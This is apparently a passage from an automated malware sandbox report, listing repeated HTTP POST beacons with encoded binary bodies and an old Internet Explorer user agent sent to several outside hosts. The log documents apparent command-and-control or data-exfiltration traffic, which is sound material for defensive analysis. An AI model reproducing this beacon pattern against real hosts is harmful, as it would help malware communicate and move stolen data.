67 4e 75 58 45 59 5a 57 30 42 5a 39 34 4e 4f 36 79 78 64 6f 42 33 75 64 37 7a 46 65 43 73 68 63 4b 52 72 7a 6c 70 35 79 30 30 66 6a 64 32 61 37 4f 41 7a 6a 76 53 36 6a 6f 44 4c 39 51 6d 2f 33 76 48 4e 6c 55 47 42 31 78 2f 58 74 38 66 6c 76 74 33 61 76 36 75 35 44 48 50 6c 37 4e 35 78 2f 69 30 6a 67 6a 50 45 44 33 38 5a 59 34 31 47 30 6c 36 41 46 6c 63 36 6c 55 7a 48 46 57 6a 4e 36 55 46 30 69 6c 65 32 73 35 33 41 57 72 66 4e 55 45 6f 63 52 2b 64 31 38 52 6c 39 4a 32 6c 64 67 2b 30 6e 7a 41 58 4b 31 4b 6e 7a 79 36 70 5a 38 52 6a 56 4d 42 79 64 52 37 35 4c 50 73 71 57 61 79 35 71 54 43 42 2b 4b 56 49 56 39 54 62 6d 74 56 49 68 74 68 36 69 63 77 67 2b 4a 42 34 4b 50 5a 73 46 54 6b 77 4f 63 5a 58 6d 50 33 70 57 45 6d 50 77 58 48 6a 70 37 78 56 4d 4d 34 39 73 36 6e 4f 45 54 76 34 54 78 71 45 50 34 46 45 43 4b 45 56 57 33 45 72 52 5a 31 74 44 46 42 34 50 6e 47 33 53 59 4c 35 58 4e 35 53 2f 53 4d 5a 76 76 31 66 49 50 61 53 49 71 5a 32 2f 57 4d 67 61 49 34 6d 64 56 70 43 70 6a 78 75 48 55 6b 70 70 35 50 75 41 70 52 51 74 56 6f 42 76 6b 6d 62 6d 2f 55 56 74 55 46 58 63 57 61 70 4f 75 47 35 41 4c 75 37 53 61 50 2f 51 54 77 38 31 56 35 78 35 6d 37 50 33 5a 53 4c 42 33 4a 50 48 4b 68 78 6f 51 34 47 63 74 50 4c 62 6f 75 48 53 61 7a 4e 56 54 38 4b 42 61 61 77 3d 3d Data Ascii: bnPmOkHnIpYbhKJpIJexWRotrly/ca/xBVIiyhI9Ih2rli2oTWsS6qiQUcA1PP1eKaE3eeHP1FT01vC1x1R0ZyIo9Ny6Hykl3nW4fWT/ifviWzCPwoS0Vv/NF5bgqB8u/CnlgNuXEYZW0BZ94NO6yxdoB3ud7zFeCshcKRrzlp5y00fjd2a7OAzjvS6joDL9Qm/3vHNlUGB1x/Xt8flvt3av6u5DHPl7N5x/i0jgjPED38ZY41G0l6AFlc6lUzHFWjN6UF0ile2s53AWrfNUEocR+d18Rl9J2ldg+0nzAXK1Knzy6pZ8RjVMBydR75LPsqWay5qTCB+KVIV9TbmtVIhth6icwg+JB4KPZsFTkwOcZXmP3pWEmPwXHjp7xVMM49s6nOETv4TxqEP4FECKEVW3ErRZ1tDFB4PnG3SYL5XN5S/SMZvv1fIPaSIqZ2/WMgaI4mdVpCpjxuHUkpp5PuApRQtVoBvkmbm/UVtUFXcWapOuG5ALu7SaP/QTw81V5x5m7P3ZSLB3JPHKhxoQ4GctPLbouHSazNVT8KBaaw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 71 48 45 76 4f 4c 54 51 49 70 61 4f 7a 4e 43 62 44 30 54 76 48 41 65 69 72 4c 71 73 48 34 73 66 4b 46 45 58 47 47 72 47 50 53 4d 57 74 61 31 4f 47 6d 6f 7a 70 61 4f 53 4a 6e 36 4d 36 44 76 48 7a 4a 50 6d 6e 46 34 4e 32 47 79 71 4e 47 52 66 30 33 4e 32 6a 73 6c 72 4c 37 41 6a 4c 37 2b 58 4e 52 2b 49 46 42 73 4c 63 2f 77 5a 47 59 37 59 79 65 46 54 75 42 4c 77 74 45 31 69 63 4d 30 4f 49 7a 73 64 53 35 79 6c 57 34 34 66 38 44 34 35 58 32 48 68 59 4a 79 56 48 36 77 5a 4a 4a 4e 68 63 6d 73 67 36 4a 4a 38 77 71 36 45 4c 38 65 52 5a 34 4b 68 65 41 37 47 74 39 57 50 32 30 31 76 48 69 6f 6d 42 30 50 7a 53 6c 30 5a 6b 65 69 61 6f 78 6b 2b 48 48 33 72 65 66 34 6a 34 79 4f 70 62 4d 75 64 5a 52 52 42 4e 63 42 37 74 66 53 78 52 69 4a 62 43 72 78 50 72 44 4f 59 70 79 51 77 65 46 52 5a 44 79 65 36 75 30 59 35 35 57 44 79 62 72 31 57 35 73 63 42 66 52 66 6d 4e 6a 66 49 30 7a 76 64 65 38 49 77 2f 52 64 75 49 72 46 78 63 68 47 50 46 44 30 76 35 6f 44 54 4b 47 7a 42 73 56 47 42 5a 54 67 51 50 74 61 43 6a 4e 68 4e 6d 66 38 61 76 79 31 7a 47 48 36 37 52 6f 6a 34 49 4e 6c 61 49 5a 7a 53 52 65 65 65 54 75 76 2b 75 50 2b 4e 4f 76 56 6c 55 31 6b 67 74 35 45 69 6d 55 50 6b 77 4c 59 78 5a 31 79 32 35 6b 45 41 68 79 70 55 53 73 66 64 52 48 6e 43 45 54 2f 70 30 37 31 54 52 52 53 74 73 67 42 59 66 67 33 6b 6d 6a 6f 49 59 78 6d 64 2f 72 54 74 7a 50 67 32 4e 58 73 4e 30 7a 61 30 77 75 65 34 55 48 68 59 6b 51 59 46 6c 39 31 75 42 56 58 2b 36 62 44 46 6b 34 6e 65 74 48 62 63 57 57 4c 6e 42 4f 5a 52 72 4c 64 6f 30 36 37 39 70 4f 62 71 67 51 6c 50 70 33 47 69 72 42 53 69 43 68 44 7a 62 75 2b 50 68 6a 63 49 6f 4f 71 46 5a 2b 4f 67 43 72 4e 77 30 51 3d 3d Data Ascii: qHEvOLTQIpaOzNCbD0TvHAeirLqsH4sfKFEXGGrGPSMWta1OGmozpaOSJn6M6DvHzJPmnF4N2GyqNGRf03N2jslrL7AjL7+XNR+IFBsLc/wZGY7YyeFTuBLwtE1icM0OIzsdS5ylW44f8D45X2HhYJyVH6wZJJNhcmsg6JJ8wq6EL8eRZ4KheA7Gt9WP201vHiomB0PzSl0Zkeiaoxk+HH3ref4j4yOpbMudZRRBNcB7tfSxRiJbCrxPrDOYpyQweFRZDye6u0Y55WDybr1W5scBfRfmNjfI0zvde8Iw/RduIrFxchGPFD0v5oDTKGzBsVGBZTgQPtaCjNhNmf8avy1zGH67Roj4INlaIZzSReeeTuv+uP+NOvVlU1kgt5EimUPkwLYxZ1y25kEAhypUSsfdRHnCET/p071TRRStsgBYfg3kmjoIYxmd/rTtzPg2NXsN0za0wue4UHhYkQYFl91uBVX+6bDFk4netHbcWWLnBOZRrLdo0679pObqgQlPp3GirBSiChDzbu+PhjcIoOqFZ+OgCrNw0Q==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: _mcnc=1; __goc_session__=itstfzxkxoxpnauzzfcixwhstikzroxsData Raw: 43 32 45 41 4f 58 76 58 49 70 5a 58 4e 6a 4f 77 45 75 59 52 79 57 53 66 71 42 6d 42 52 35 49 58 33 2f 68 49 55 5a 44 30 37 42 76 4c 7a 50 35 4e 4b 6a 43 2b 74 64 41 36 44 70 56 44 61 43 55 69 4f 37 6c 54 41 4e 76 4c 45 47 45 4a 31 68 55 35 39 38 6c 4b 39 4a 2f 77 48 48 45 53 69 53 49 47 71 57 71 5a 38 71 72 52 46 33 56 64 4c 70 37 77 6e 30 32 43 56 59 52 57 64 57 30 69 4f 4c 30 33 77 30 32 34 4d 49 41 55 32 75 6b 5a 6f 73 67 6d 43 73 6f 66 41 79 59 43 51 4d 55 45 61 65 55 68 30 43 74 4c 64 36 58 58 4f 47 63 47 32 38 53 78 43 50 2b 64 71 50 76 73 46 46 59 56 69 55 6e 77 49 52 59 76 2b 52 55 46 36 31 39 49 75 36 7a 76 74 65 79 59 73 68 75 57 6c 48 68 54 34 46 4e 61 63 73 68 33 79 62 42 74 67 42 61 39 53 2f 72 4d 4b 41 64 4e 53 63 44 55 6c 6f 65 42 4b 46 67 78 51 35 43 70 42 68 53 73 55 2b 48 49 6c 6d 30 6d 77 67 2b 6c 79 32 39 51 79 4f 43 49 31 73 61 78 71 72 6b 4e 44 44 4a 32 33 50 42 5a 73 74 37 58 5a 6f 6b 79 75 70 5a 4b 45 52 62 79 68 41 32 30 58 2f 52 4a 6d 77 33 4e 76 58 4b 73 56 62 51 71 51 55 65 6f 38 6e 49 2b 6c 31 7a 58 35 5a 7a 42 64 35 6a 42 4e 42 4d 66 42 34 33 48 6e 46 72 53 6c 51 56 33 35 61 51 39 59 55 44 53 4c 50 33 50 62 58 36 7a 6a 68 57 55 74 42 56 48 6a 67 55 66 43 46 37 74 46 73 32 6f 4e 38 67 34 76 53 68 2b 79 31 79 36 72 49 31 48 37 52 46 44 31 53 47 35 54 72 47 59 50 74 4c 33 6f 58 74 4a 73 34 51 4f 6c 46 67 5a 79 51 4c 47 6c 63 38 34 6d 39 37 6e 2b 4f 31 77 79 51 72 77 2b 62 65 76 61 66 59 38 4d 69 36 68 41 2f 76 51 7a 4d 70 59 49 63 35 51 56 2f 37 42 39 50 7a 32 61 62 46 56 59 35 53 77 33 32 49 31 4a 7a 6d 70 44 33 54 55 31 71 6a 73 39 35 6f 2b 73 6e 71 30 37 59 77 4f 2f 39 32 6c 74 2f 58 62 35 6c 67 46 41 34 56 36 78 4a 42 74 63 6c 58 53 66 53 44 56 4f 37 47 39 79 4b 4a 63 73 67 3d 3d Data Ascii: C2EAOXvXIpZXNjOwEuYRyWSfqBmBR5IX3/hIUZD07BvLzP5NKjC+tdA6DpVDaCUiO7lTANvLEGEJ1hU598lK9J/wHHESiSIGqWqZ8qrRF3VdLp7wn02CVYRWdW0iOL03w024MIAU2ukZosgmCsofAyYCQMUEaeUh0CtLd6XXOGcG28SxCP+dqPvsFFYViUnwIRYv+RUF619Iu6zvteyYshuWlHhT4FNacsh3ybBtgBa9S/rMKAdNScDUloeBKFgxQ5CpBhSsU+HIlm0mwg+ly29QyOCI1saxqrkNDDJ23PBZst7XZokyupZKERbyhA20X/RJmw3NvXKsVbQqQUeo8nI+l1zX5ZzBd5jBNBMfB43HnFrSlQV35aQ9YUDSLP3PbX6zjhWUtBVHjgUfCF7tFs2oN8g4vSh+y1y6rI1H7RFD1SG5TrGYPtL3oXtJs4QOlFgZyQLGlc84m97n+O1wyQrw+bevafY8Mi6hA/vQzMpYIc5QV/7B9Pz2abFVY5Sw32I1JzmpD3TU1qjs95o+snq07YwO/92lt/Xb5lgFA4V6xJBtclXSfSDVO7G9yKJcsg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 39 5a 7a 68 4d 44 62 6b 4b 70 61 51 6a 63 2b 79 6b 51 37 51 50 4e 6b 36 64 4a 6c 57 6a 68 50 6a 79 75 75 33 4d 41 30 31 68 61 55 56 50 6a 6f 4c 67 78 78 62 4e 4a 52 77 54 4c 33 47 2f 57 78 7a 6e 7a 46 66 78 56 68 33 70 70 73 45 68 4c 4c 73 61 58 5a 45 31 58 44 6b 4d 42 6d 7a 76 55 53 52 61 63 58 67 6d 50 4a 61 56 76 74 39 2f 62 63 4a 43 53 77 73 70 30 41 58 5a 30 56 65 74 63 72 6a 36 78 31 67 39 30 78 65 6f 4b 70 68 4b 63 72 43 52 70 6f 45 6d 62 63 56 45 39 64 6b 58 77 52 46 56 77 6d 4b 36 56 65 72 2b 30 51 76 67 59 45 70 62 52 46 35 37 37 75 51 62 68 61 70 41 66 75 4c 4c 54 51 4e 6c 69 77 6f 56 67 34 41 4f 54 6f 75 57 4d 33 4c 7a 6d 42 35 4f 58 4c 42 53 78 71 46 73 4b 74 63 77 4c 6a 62 39 33 51 77 34 34 32 4c 62 5a 4c 31 33 78 45 48 48 76 53 4a 4c 48 72 45 64 50 30 36 57 49 30 36 4d 63 76 47 72 56 75 50 34 63 46 6a 6d 49 4c 59 2b 36 77 37 78 4e 31 62 32 73 41 71 4f 76 66 74 32 4f 67 48 4e 35 4e 4a 61 65 58 6e 47 4d 39 48 4f 71 41 35 6e 42 77 59 30 2f 5a 73 70 47 42 54 31 57 58 42 64 30 2f 66 73 49 56 61 51 35 2b 71 71 61 66 51 6b 4b 31 7a 79 6d 5a 6a 53 59 73 4f 30 66 37 37 58 63 35 46 4e 31 2f 41 47 6a 46 32 43 30 37 61 4e 4c 2b 4e 70 38 4e 64 63 55 4f 33 30 78 71 4c 6f 4f 4d 64 31 68 2f 57 46 58 45 41 4f 47 72 75 6a 71 54 41 55 6c 74 54 70 76 68 37 6a 43 44 57 69 53 56 70 6e 5a 63 6f 59 71 76 53 34 76 71 67 6b 34 4c 69 53 4e 46 52 55 42 54 69 6e 63 46 70 38 6d 70 56 6f 6c 39 6d 6a 37 48 62 5a 2b 34 47 77 44 56 2f 4a 64 32 72 79 35 4e 36 59 39 7a 4a 48 32 6b 38 5a 36 41 2f 73 31 34 64 59 6d 32 2b 49 69 37 6c 42 6d 55 57 56 55 69 50 36 6b 58 37 62 58 53 4d 75 50 36 64 44 4d 78 74 Data Ascii: 9ZzhMDbkKpaQjc+ykQ7QPNk6dJlWjhPjyuu3MA01haUVPjoLgxxbNJRwTL3G/WxznzFfxVh3ppsEhLLsaXZE1XDkMBmzvUSRacXgmPJaVvt9/bcJCSwsp0AXZ0Vetcrj6x1g90xeoKphKcrCRpoEmbcVE9dkXwRFVwmK6Ver+0QvgYEpbRF577uQbhapAfuLLTQNliwoVg4AOTouWM3LzmB5OXLBSxqFsKtcwLjb93Qw442LbZL13xEHHvSJLHrEdP06WI06McvGrVuP4cFjmILY+6w7xN1b2sAqOvft2OgHN5NJaeXnGM9HOqA5nBwY0/ZspGBT1WXBd0/fsIVaQ5+qqafQkK1zymZjSYsO0f77Xc5FN1/AGjF2C07aNL+Np8NdcUO30xqLoOMd1h/WFXEAOGrujqTAUltTpvh7jCDWiSVpnZcoYqvS4vqgk4LiSNFRUBTincFp8mpVol9mj7HbZ+4GwDV/Jd2ry5N6Y9zJH2k8Z6A/s14dYm2+Ii7lBmUWVUiP6kX7bXSMuP6dDMxt
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 33 2b 58 2f 4f 48 62 58 49 70 59 6d 65 67 46 48 30 65 69 53 79 42 6e 4d 6a 71 57 57 6b 69 53 72 43 6e 50 6d 49 62 67 72 6c 66 50 54 53 72 33 58 50 54 58 32 37 4b 66 46 58 45 32 77 79 6f 7a 6e 52 44 46 77 2f 52 37 65 63 50 58 31 4b 6a 52 6c 46 6b 53 39 30 41 43 70 6f 7a 61 5a 33 72 34 6b 48 77 45 6f 6f 6d 55 32 46 78 71 6a 70 64 2b 58 72 5a 45 75 56 49 79 77 71 47 70 72 6c 78 56 4c 46 56 48 44 32 76 52 61 32 61 78 78 6c 2b 38 38 7a 76 33 38 54 52 79 6b 66 73 53 6e 54 65 6a 36 36 6b 4f 6d 38 6b 61 43 4c 31 7a 68 71 7a 4b 38 30 55 2f 33 2b 6e 4b 59 68 51 72 75 75 5a 78 65 68 7a 33 73 39 4a 62 49 4a 4e 57 4a 73 52 49 77 34 6a 76 38 42 38 75 2f 32 72 66 6c 2b 62 75 4f 38 4e 6f 7a 43 6a 72 35 6a 50 38 42 41 33 6f 42 37 59 75 48 52 59 61 77 68 49 4c 55 76 72 69 72 70 59 56 43 54 5a 71 5a 51 39 53 38 61 39 61 31 39 31 43 74 38 37 56 6d 50 4e 47 35 64 55 68 46 70 74 74 30 36 6d 64 56 67 41 5a 35 70 73 71 37 32 59 58 6d 76 51 49 5a 69 31 50 6d 66 4b 51 41 59 4f 59 33 6d 6a 69 46 62 68 79 6d 36 43 32 57 49 71 44 2b 38 44 48 6b 4b 4d 56 4d 64 73 56 43 5a 6b 4e 37 54 5a 69 4c 70 32 59 58 33 58 52 30 39 45 37 72 72 61 4f 6f 53 65 4d 53 48 68 65 4a 37 4f 66 70 36 4d 69 53 49 55 69 71 2f 31 58 49 6f 64 39 70 2f 63 4a 77 39 6d 75 46 5a 33 46 53 7a 45 44 5a 32 50 42 4c 74 47 59 73 57 68 62 5a 5a 56 63 2f 72 6f 2f 6a 72 70 41 68 53 4b 56 2f 64 44 34 67 48 66 62 49 6c 37 43 68 70 6a 6b 71 39 6b 49 63 41 4b 52 62 37 34 45 62 4d 54 78 49 6d 4f 5a 49 64 48 46 75 4f 71 61 31 70 43 61 37 4d 48 55 68 30 53 6f 62 42 72 51 64 38 4a 4b 47 68 43 58 45 47 77 32 57 46 61 57 57 78 69 6c 37 56 30 31 78 75 35 36 41 39 6e 4f 4e 6e 4d 55 76 56 76 70 77 4c 33 36 63 74 59 2f 5a 42 62 44 4e 52 4a 35 71 68 32 2b 37 33 50 48 36 42 51 49 63 4c 4a 37 64 73 67 3d 3d Data Ascii: 3+X/OHbXIpYmegFH0eiSyBnMjqWWkiSrCnPmIbgrlfPTSr3XPTX27KfFXE2wyoznRDFw/R7ecPX1KjRlFkS90ACpozaZ3r4kHwEoomU2Fxqjpd+XrZEuVIywqGprlxVLFVHD2vRa2axxl+88zv38TRykfsSnTej66kOm8kaCL1zhqzK80U/3+nKYhQruuZxehz3s9JbIJNWJsRIw4jv8B8u/2rfl+buO8NozCjr5jP8BA3oB7YuHRYawhILUvrirpYVCTZqZQ9S8a9a191Ct87VmPNG5dUhFptt06mdVgAZ5psq72YXmvQIZi1PmfKQAYOY3mjiFbhym6C2WIqD+8DHkKMVMdsVCZkN7TZiLp2YX3XR09E7rraOoSeMSHheJ7Ofp6MiSIUiq/1XIod9p/cJw9muFZ3FSzEDZ2PBLtGYsWhbZZVc/ro/jrpAhSKV/dD4gHfbIl7Chpjkq9kIcAKRb74EbMTxImOZIdHFuOqa1pCa7MHUh0SobBrQd8JKGhCXEGw2WFaWWxil7V01xu56A9nONnMUvVvpwL36ctY/ZBbDNRJ5qh2+73PH6BQIcLJ7dsg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 68 58 6c 6d 4c 2b 54 58 4b 70 61 31 41 55 43 6f 66 38 48 6b 41 37 65 63 44 6f 57 63 37 69 39 52 57 50 50 51 63 4f 41 69 4a 54 6e 52 70 37 7a 4b 52 32 44 47 30 2b 4b 49 54 75 58 74 69 61 4d 53 31 71 72 76 54 6e 34 62 52 42 58 6b 58 72 38 30 54 51 6e 7a 72 34 78 6c 59 77 55 74 65 6d 70 6d 61 75 52 58 6e 6b 2f 75 49 73 55 34 6e 37 77 35 72 49 43 6f 70 49 70 65 73 55 4d 4c 49 58 70 4b 6c 74 52 71 6c 5a 45 49 37 68 41 61 49 4c 4a 46 67 53 75 4c 51 35 4d 37 45 67 76 71 45 35 4f 51 59 49 79 76 41 36 38 73 5a 4c 58 71 51 42 67 41 32 68 44 79 61 67 52 58 53 6c 6a 70 63 70 36 6c 4c 2b 36 54 52 35 71 6f 32 31 54 73 72 30 4e 44 53 37 6c 59 6f 73 67 44 38 4a 71 69 35 6f 4b 66 58 6f 59 31 76 37 64 77 44 33 75 39 72 69 69 47 37 59 4f 36 70 49 2f 6a 68 67 42 42 64 44 55 65 32 41 6b 35 46 4c 38 36 37 48 52 43 68 6d 62 56 6f 61 30 78 77 4c 65 56 32 39 47 51 45 45 48 4f 73 44 46 46 44 57 72 58 38 50 37 78 47 64 77 31 5a 77 4a 68 6d 2b 44 4f 61 2f 50 73 72 7a 35 54 4e 31 67 6b 79 45 47 6d 52 61 65 55 6b 6b 36 39 4b 69 6f 77 64 50 54 63 6e 72 31 64 52 59 72 46 38 69 34 31 37 69 42 2f 78 58 67 4d 63 72 63 6c 51 39 66 49 65 47 34 39 69 77 69 44 34 74 34 53 65 56 41 34 58 6a 33 6a 77 4e 33 51 73 6e 72 6b 42 70 4d 50 30 67 64 56 51 35 48 36 67 73 71 79 4f 6f 54 56 34 66 6f 61 48 66 69 6f 41 64 71 45 55 44 65 2b 58 58 49 57 69 79 57 34 63 67 64 6a 64 51 68 65 53 66 52 4c 54 4d 2f 46 7a 32 44 6d 47 41 58 70 54 2b 4a 48 73 77 68 79 75 48 33 43 47 74 4f 48 43 38 46 71 66 63 71 4d 64 59 33 64 46 4e 76 51 57 7a 63 4d 34 59 6a 32 31 6d 6e 68 7a 61 62 65 66 4f 72 6c 38 65 43 72 51 38 46 44 79 6c 30 67 46 37 6b 5a 70 6c 51 38 49 46 57 79 58 35 62 31 45 76 6a 2f 34 79 37 4b 54 7a 42 57 79 77 6f 73 6b 59 2f 4f 63 64 65 49 44 63 2b 2b 6c 36 30 3d Data Ascii: hXlmL+TXKpa1AUCof8HkA7ecDoWc7i9RWPPQcOAiJTnRp7zKR2DG0+KITuXtiaMS1qrvTn4bRBXkXr80TQnzr4xlYwUtempmauRXnk/uIsU4n7w5rICopIpesUMLIXpKltRqlZEI7hAaILJFgSuLQ5M7EgvqE5OQYIyvA68sZLXqQBgA2hDyagRXSljpcp6lL+6TR5qo21Tsr0NDS7lYosgD8Jqi5oKfXoY1v7dwD3u9riiG7YO6pI/jhgBBdDUe2Ak5FL867HRChmbVoa0xwLeV29GQEEHOsDFFDWrX8P7xGdw1ZwJhm+DOa/Psrz5TN1gkyEGmRaeUkk69KiowdPTcnr1dRYrF8i417iB/xXgMcrclQ9fIeG49iwiD4t4SeVA4Xj3jwN3QsnrkBpMP0gdVQ5H6gsqyOoTV4foaHfioAdqEUDe+XXIWiyW4cgdjdQheSfRLTM/Fz2DmGAXpT+JHswhyuH3CGtOHC8FqfcqMdY3dFNvQWzcM4Yj21mnhzabefOrl8eCrQ8FDyl0gF7kZplQ8IFWyX5b1Evj/4y7KTzBWywoskY/OcdeIDc++l60=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 71 48 45 76 4f 4c 54 51 49 70 61 4f 7a 4e 43 62 44 30 54 76 48 41 65 69 72 4c 71 73 48 34 73 66 4b 46 45 58 47 47 72 47 50 53 4d 57 74 61 31 4f 47 6d 6f 7a 70 61 4f 53 4a 6e 36 4d 36 44 76 48 7a 4a 50 6d 6e 46 34 4e 32 47 79 71 4e 47 52 66 30 33 4e 32 6a 73 6c 72 4c 37 41 6a 4c 37 2b 58 4e 52 2b 49 46 42 73 4c 63 2f 77 5a 47 59 37 59 79 65 46 54 75 42 4c 77 74 45 31 69 63 4d 30 4f 49 7a 73 64 53 35 79 6c 57 34 34 66 38 44 34 35 58 32 48 68 59 4a 79 56 48 36 77 5a 4a 4a 4e 68 63 6d 73 67 36 4a 4a 38 77 71 36 45 4c 38 65 52 5a 34 4b 68 65 41 37 47 74 39 57 50 32 30 31 76 48 69 6f 6d 42 30 50 7a 53 6c 30 5a 6b 65 69 61 6f 78 6b 2b 48 48 33 72 65 66 34 6a 34 79 4f 70 62 4d 75 64 5a 52 52 42 4e 63 42 37 74 66 53 78 52 69 4a 62 43 72 78 50 72 44 4f 59 70 79 51 77 65 46 52 5a 44 79 65 36 75 30 59 35 35 57 44 79 62 72 31 57 35 73 63 42 66 52 66 6d 4e 6a 66 49 30 7a 76 64 65 38 49 77 2f 52 64 75 49 72 46 78 63 68 47 50 46 44 30 76 35 6f 44 54 4b 47 7a 42 73 56 47 42 5a 54 67 51 50 74 61 43 6a 4e 68 4e 6d 66 38 61 76 79 31 7a 47 48 36 37 52 6f 6a 34 49 4e 6c 61 49 5a 7a 53 52 65 65 65 54 75 76 2b 75 50 2b 4e 4f 76 56 6c 55 31 6b 67 74 35 45 69 6d 55 50 6b 77 4c 59 78 5a 31 79 32 35 6b 45 41 68 79 70 55 53 73 66 64 52 48 6e 43 45 54 2f 70 30 37 31 54 52 52 53 74 73 67 42 59 66 67 33 6b 6d 6a 6f 49 59 78 6d 64 2f 72 54 74 7a 50 67 32 4e 58 73 4e 30 7a 61 30 77 75 65 34 55 48 68 59 6b 51 59 46 6c 39 31 75 42 56 58 2b 36 62 44 46 6b 34 6e 65 74 48 62 63 57 57 4c 6e 42 4f 5a 52 72 4c 64 6f 30 36 37 39 70 4f 62 71 67 51 6c 50 70 33 47 69 72 42 53 69 43 68 44 7a 62 75 2b 50 68 6a 63 49 6f 4f 71 46 5a 2b 4f 67 43 72 4e 77 30 51 3d 3d Data Ascii: qHEvOLTQIpaOzNCbD0TvHAeirLqsH4sfKFEXGGrGPSMWta1OGmozpaOSJn6M6DvHzJPmnF4N2GyqNGRf03N2jslrL7AjL7+XNR+IFBsLc/wZGY7YyeFTuBLwtE1icM0OIzsdS5ylW44f8D45X2HhYJyVH6wZJJNhcmsg6JJ8wq6EL8eRZ4KheA7Gt9WP201vHiomB0PzSl0Zkeiaoxk+HH3ref4j4yOpbMudZRRBNcB7tfSxRiJbCrxPrDOYpyQweFRZDye6u0Y55WDybr1W5scBfRfmNjfI0zvde8Iw/RduIrFxchGPFD0v5oDTKGzBsVGBZTgQPtaCjNhNmf8avy1zGH67Roj4INlaIZzSReeeTuv+uP+NOvVlU1kgt5EimUPkwLYxZ1y25kEAhypUSsfdRHnCET/p071TRRStsgBYfg3kmjoIYxmd/rTtzPg2NXsN0za0wue4UHhYkQYFl91uBVX+6bDFk4netHbcWWLnBOZRrLdo0679pObqgQlPp3GirBSiChDzbu+PhjcIoOqFZ+OgCrNw0Q==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: _mcnc=1; __goc_session__=itstfzxkxoxpnauzzfcixwhstikzroxsData Raw: 43 32 45 41 4f 58 76 58 49 70 5a 58 4e 6a 4f 77 45 75 59 52 79 57 53 66 71 42 6d 42 52 35 49 58 33 2f 68 49 55 5a 44 30 37 42 76 4c 7a 50 35 4e 4b 6a 43 2b 74 64 41 36 44 70 56 44 61 43 55 69 4f 37 6c 54 41 4e 76 4c 45 47 45 4a 31 68 55 35 39 38 6c 4b 39 4a 2f 77 48 48 45 53 69 53 49 47 71 57 71 5a 38 71 72 52 46 33 56 64 4c 70 37 77 6e 30 32 43 56 59 52 57 64 57 30 69 4f 4c 30 33 77 30 32 34 4d 49 41 55 32 75 6b 5a 6f 73 67 6d 43 73 6f 66 41 79 59 43 51 4d 55 45 61 65 55 68 30 43 74 4c 64 36 58 58 4f 47 63 47 32 38 53 78 43 50 2b 64 71 50 76 73 46 46 59 56 69 55 6e 77 49 52 59 76 2b 52 55 46 36 31 39 49 75 36 7a 76 74 65 79 59 73 68 75 57 6c 48 68 54 34 46 4e 61 63 73 68 33 79 62 42 74 67 42 61 39 53 2f 72 4d 4b 41 64 4e 53 63 44 55 6c 6f 65 42 4b 46 67 78 51 35 43 70 42 68 53 73 55 2b 48 49 6c 6d 30 6d 77 67 2b 6c 79 32 39 51 79 4f 43 49 31 73 61 78 71 72 6b 4e 44 44 4a 32 33 50 42 5a 73 74 37 58 5a 6f 6b 79 75 70 5a 4b 45 52 62 79 68 41 32 30 58 2f 52 4a 6d 77 33 4e 76 58 4b 73 56 62 51 71 51 55 65 6f 38 6e 49 2b 6c 31 7a 58 35 5a 7a 42 64 35 6a 42 4e 42 4d 66 42 34 33 48 6e 46 72 53 6c 51 56 33 35 61 51 39 59 55 44 53 4c 50 33 50 62 58 36 7a 6a 68 57 55 74 42 56 48 6a 67 55 66 43 46 37 74 46 73 32 6f 4e 38 67 34 76 53 68 2b 79 31 79 36 72 49 31 48 37 52 46 44 31 53 47 35 54 72 47 59 50 74 4c 33 6f 58 74 4a 73 34 51 4f 6c 46 67 5a 79 51 4c 47 6c 63 38 34 6d 39 37 6e 2b 4f 31 77 79 51 72 77 2b 62 65 76 61 66 59 38 4d 69 36 68 41 2f 76 51 7a 4d 70 59 49 63 35 51 56 2f 37 42 39 50 7a 32 61 62 46 56 59 35 53 77 33 32 49 31 4a 7a 6d 70 44 33 54 55 31 71 6a 73 39 35 6f 2b 73 6e 71 30 37 59 77 4f 2f 39 32 6c 74 2f 58 62 35 6c 67 46 41 34 56 36 78 4a 42 74 63 6c 58 53 66 53 44 56 4f 37 47 39 79 4b 4a 63 73 67 3d 3d Data Ascii: 